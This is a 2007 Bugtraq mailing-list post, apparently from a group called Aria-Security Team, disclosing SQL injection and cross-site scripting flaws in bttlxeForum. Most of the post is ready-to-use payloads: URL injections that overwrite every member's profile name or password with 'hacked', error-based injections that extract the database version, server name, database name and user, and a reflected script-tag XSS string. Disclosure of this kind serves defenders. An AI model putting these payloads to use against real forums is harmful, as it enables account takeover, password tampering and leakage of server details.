[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20071209010131.31880.qmail@securityfocus.com>
Date: 9 Dec 2007 01:01:31 -0000
From: noreply@...a-security.net
To: bugtraq@...urityfocus.com
Subject: bttlxeForum Multiple SQL Injection And Cross Site Scripting
Aria-Security Team
http://Aria-Security.Net
-----------------------------
Discovered By: Mormoroth
Shout outs The-0utlaw for completing the vuln.
I.SQL Injection
http://site.ltd/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';--
This Changes MemberList...
http://site.ltd/myaccount/viewProfile.asp?member='update Members set Password='hacked';--
changes all the users' password to hacked
myaccount/psswd.asp
has the same problem
a' or 1=convert(int,@@version)--
a' or 1=convert(int,@@servername)--
a' or 1=convert(int,db_name())--
a' or 1=convert(int,user_name())--
a' or 1=convert(int,system_user)
Might be useful.
II.Cross Site SCripting:
failure.asp?err_txt="><script>alert('Aria-Security.Net')</script>
Adivsory @ http://aria-security.net/forum/forumdisplay.php?f=60
Credits Goes To Aria-Security Team
Powered by blists - more mailing lists